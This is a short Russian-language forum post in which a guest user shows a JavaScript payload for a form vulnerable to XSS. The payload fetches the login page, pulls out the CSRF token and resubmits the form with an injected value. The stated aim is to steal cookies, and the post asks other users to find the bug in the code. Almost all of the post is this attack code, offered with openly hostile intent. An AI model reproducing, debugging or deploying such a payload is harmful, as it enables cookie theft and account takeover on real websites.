13.04.2017, 23:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
11346
Репутация:
1
|
|
Вот форма уязвимая к XSS . В ней есть токен csrf_tok
Код HTML:
HTML:
document.getElementsByTagName('form')[0].submit();
Для того что бы стырить куки, надо отправить эту форму с правильным токеном. Значит сперва его нужно выдернуть и вставить в свою форму.
Создаю js который вставляю в уязвимое к XSS поле
Код HTML:
HTML:
function request(url, type, callback, send){
var oReq = new XMLHttpRequest();
oReq.open(type, url, true);
oReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
oReq.onload = callback;
oReq.send(send);
};
function getListener () {
var el = document.createElement('div');
el.innerHTML = this.responseText;
request('login', 'POST', postListener, 'csrf_tok=' + el.querySelector('input[name="csrf_tok"]').value + '&Login=alert(xss)'+ '&Pass=12345678');
};
function postListener(){
console.log(this.responseText)
};
request('login', 'GET', getListener);
Подскажите где ошибка. |
|
|
|